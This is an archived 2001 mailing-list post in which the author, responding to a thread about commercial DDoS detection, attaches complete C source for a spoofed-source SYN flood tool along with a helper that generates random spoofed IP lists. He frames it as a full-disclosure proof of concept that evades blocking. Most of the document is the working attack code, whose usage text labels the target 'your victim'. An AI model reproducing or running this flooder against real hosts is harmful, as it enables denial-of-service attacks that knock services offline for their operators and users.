IW: Tools Stunt DoS Attacks

[Andrew Alston]

Unfortunatly DDOS Attacks seem to be here to stay... There are a LOT of
ways to bypass detection, one of them would be something to this
effect... 

I wrote this to test something after reading the original post, this took
10 minutes, and it is a simple proof of case that there ARE ways around
"Abnormal activity".  What is attached is very very simple, its your basic
syn flooder with large packets (8k per packet), each packet coming from a
different ip address (spoofed), obtained from a spoof file, this spoof
file is then reused x number of times as specified by the cycle parameter.

Please note: I didnt write this to use myself, I wrote this to test
something and as a proof of case, and believing in total disclosure
security policies and freedom of information Ive decided to open the code
to see if anyone can find a way around this type of thing.

The thing with this code, is that it is virtually impossible to block,
along with the actual DOS code is a thing called resetgen.c, that
resetgen.c generates another 1000 spoofed ips, if each host were to cycle
their spoof files once, run that, cycle again, in a loop, and you ran this
from a number of hosts at a time, the only way to block the traffic would
be to firewall out the port in question completely, because the packet
type is of type syn, if you block syn, nothing can connect to the port in
question.

Basically, people who claim to be able to stop DDOS/trace DDOS/etc etc I
believe are playing on the public, making money out of a situation that
unfortunatly has no end in site, due to the fuckups made in the IP
protocol by the department of defense when they released the RFC.

Cheers

Andrew Alston


On Mon, 5 Feb 2001, Adam Back wrote:

> 
> This sounds like just a short term work-around, easily countered by
> the DoSers.
> 
> Rather than fix the problem, they propose to try to detect "unusual
> activity" and block the IPs.  I'm not sure what "trace" means either
> -- identify IPs and hunt down the perpetrators?
> 
> It's predictable low tech approach to all net problems -- identify
> undesirable behavior, trace it, complain to ISPs, block it, form
> coallitions against the behavior with central clearing houses of
> people to block.
> 
> Ultimately you can't distinguish between DDoS and popular content.
> They're just pushing the DDoS crowd to the next obvious and easy level
> -- bypass their fingerprinting of unusual behavior.  They can't
> counter-escalate much futher because they'll start getting into false
> positives and rejecting legitimate traffic.
> 
> Any robust long term solution to DDoS needs to defend against DDoS
> with Distributed Service.  If content can be mirrored and cached
> reactively to traffic, mature versions of systems like FreeNet could
> be built to cope with DDoS.  If requests are routed to local caches
> there is no longer a central server taking all the traffic, which is
> the basic problem these people are trying to kludge around.
> 
> They might want to look at Hash Cash and Client Puzzles for systems
> which can't be easily distributed (web apps with central database
> needing to be updated).
> 
> Adam
> 
> > Roughly a year after cyber-terrorists paralyzed some of the Web's
> > most trafficked sites, technology is finally emerging to stop such
> > distributed denial-of-service attacks before they ever reach their
> > target sites.
> > 
> > [...]
> > 
> > To combat such attacks on routers, a new company called Arbor
> > Networks--funded by Cisco and Intel--this week will launch a managed
> > availability service that aims to detect, trace and block DoS
> > attacks.
> > 
> > http://update.internetweek.com/cgi-bin4/flo?y=eCNx0Bd6gU0V30DDqD
> 
> 
-------------- next part --------------
#define __BSD_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>

#define PAYLOAD 20000			/* Bytes for our payload */

struct slist {
	struct in_addr  spoof;
	struct slist   *link;
};					/* Spoof list */

int
main(int argc, char *argv[])
{

	int i, int2;
	int             sock;		/* Socket stuff */
	int             on = 1;		/* Socket stuff */
	struct sockaddr_in sockstruct;	/* Socket stuff */
	struct ip      *iphead;		/* IP Header pointer */
	struct tcphdr  *tcphead;	/* TCP Header pointer */
	char            evilpacket[sizeof(struct ip) + sizeof(struct
tcphdr) + 8000];
					/* Our reset packet */
	int             seq, ack;	/* Sequence and Acknowledgement #'s
*/
	FILE           *spooffile;	/* Spoof file */
	char           *buffer;		/* Spoof file read buffer */
	struct slist   *scur, *sfirst;	/* Spoof linked list pointers */
	char src[20], dst[20];		/* Work around for inet_ntoa static
*/
					/* Pointers when using printf() */
	int dport, delay;		/* CMD Line stuff */
	int cycles;
	int target;			/* Target address from inet_addr()
*/


	if(argc < 6) {
		fprintf(stderr, "Usage: %s spoof_file target dport delay cycles\n"
		"spoof_file = addresses to spoof from\n"
		"target = your victim\n"
		"dport = Port we are attacking\n"
		"delay = Delay in milliseconds between packets\n"
		"cycles = Number of cycles\n", argv[0]);
		exit(-1);
		}
	else {
		dport = atoi(argv[3]);
		delay = atoi(argv[4]);
		cycles = atoi(argv[5]);
		};
	
	printf("Used spoof file %s\n"
	       "Destination: [%s] port: [%d]\n"
	       "Delay time [%d]\n"
		"Cycles [%d]\n",
		argv[1], argv[2], dport, delay, cycles);

	sleep(1);

	bzero(evilpacket, sizeof(evilpacket));
					/* Clean our reset packet */

	sfirst = malloc(sizeof(struct slist));
	scur = sfirst;
	scur->link = NULL;		/* Setup our spoof linked list */

	if(!(buffer = malloc(25))) {
		perror("malloc");
		exit(-1);
		};			/* Allocate for read buffer */

	if ((spooffile = fopen((char *) argv[1], "r")) <= 0) {
		perror("fopen");
		exit(-1);		/* Open our spoof file */
	} else {
		while (fgets(buffer, 25, spooffile)) { 	/* Read till EOF */
			if (!(inet_aton(buffer, &(scur->spoof))))
				printf("Invalid address found in victim
file.. ignoring\n");
			else {
				scur->link = malloc(sizeof(struct slist));
				scur = scur->link;
				scur->link = NULL;	/* Cycle l.list */
				}
			};		/* End of while loop */
		};		/* End of if {} else {} */
	

	free(buffer);			/* Free up our read buffer */
	fclose(spooffile);		/* Close our spoof file */
	scur = sfirst;			/* Set spoof list current to first
*/

	if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
		perror("socket");
		exit(-1);
	}				/* Allocate our raw socket */

	if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *) &on,
sizeof(on)) < 0) {
		perror("setsockopt");
		exit(-1);
	}				/* Set socket options for raw iphead
*/

	sockstruct.sin_family = AF_INET;
	iphead = (struct ip *) evilpacket;
	tcphead = (struct tcphdr *) (evilpacket + sizeof(struct ip));
					/* Align ip and tcp headers */

	iphead->ip_hl = 5;		/* Ip header length is 5 */
	iphead->ip_v = 4;		/* ipv4 */
	iphead->ip_len = sizeof(struct ip) + sizeof(struct tcphdr) + 8000;
					/* Length of our total packet */
	iphead->ip_id = htons(getpid());	/* Packet ID == PID # */
	iphead->ip_ttl = 255;			/* Time to live == 255 */
	iphead->ip_p = IPPROTO_TCP;		/* TCP Packet */
	iphead->ip_sum = 0;			/* No checksum */
	iphead->ip_tos = 0;			/* 0 Type of Service */
	iphead->ip_off = 0;			/* Offset is 0 */
	tcphead->th_win = htons(512);		/* TCP Window is 512 */
	tcphead->th_flags = TH_SYN;		/* Syn packet */
	tcphead->th_off = 0;	/* TCP Offset 0x50 */

	iphead->ip_dst.s_addr = inet_addr(argv[2]);

	srand(getpid());			/* Seed for rand() */
	for(int2 = 0; int2 < cycles; int2++) {
		while (scur->link != NULL) {
			seq = rand() % time(NULL);	/* Randomize our #'s */
			ack = rand() % time(NULL);	/* Randomize ack #'s */
			sockstruct.sin_port = htons(rand() % time(NULL));
			iphead->ip_src = scur->spoof;	/* Set the spoofed address
	*/
			sockstruct.sin_addr = scur->spoof;
			usleep(delay);
			tcphead->th_seq = htonl(seq);
			tcphead->th_ack = htonl(ack);
			tcphead->th_dport = htons(dport);
			tcphead->th_sport = htons((rand()%64000)+1023);
			snprintf(src, 20, "%s", inet_ntoa(iphead->ip_src));
			snprintf(dst, 20, "%s", inet_ntoa(iphead->ip_dst));
			printf("[%d] bytes [%s:%d] -> [%s:%d]\n",
				sizeof(evilpacket), src, ntohs(tcphead->th_sport), \
				dst, ntohs(tcphead->th_dport)); 
			sendto(sock, &evilpacket, sizeof(evilpacket), 0x0, \
				(struct sockaddr *)&sockstruct, sizeof(sockstruct));
							/* Send our evil packet */
			scur = scur->link;
		};
		scur = sfirst;
	};
	return (1);

};


-------------- next part --------------
#include <time.h>

int main() {
	int i;
	char *buffer;
	int octet = 0;

	srand(getpid());
	for(i = 0; i < 1000; i++) {
		printf("%d.%d.%d.%d\n",(rand()%83)+172, (rand()%83)+172, (rand()%83)+172, (rand()%83)+172);
	};
};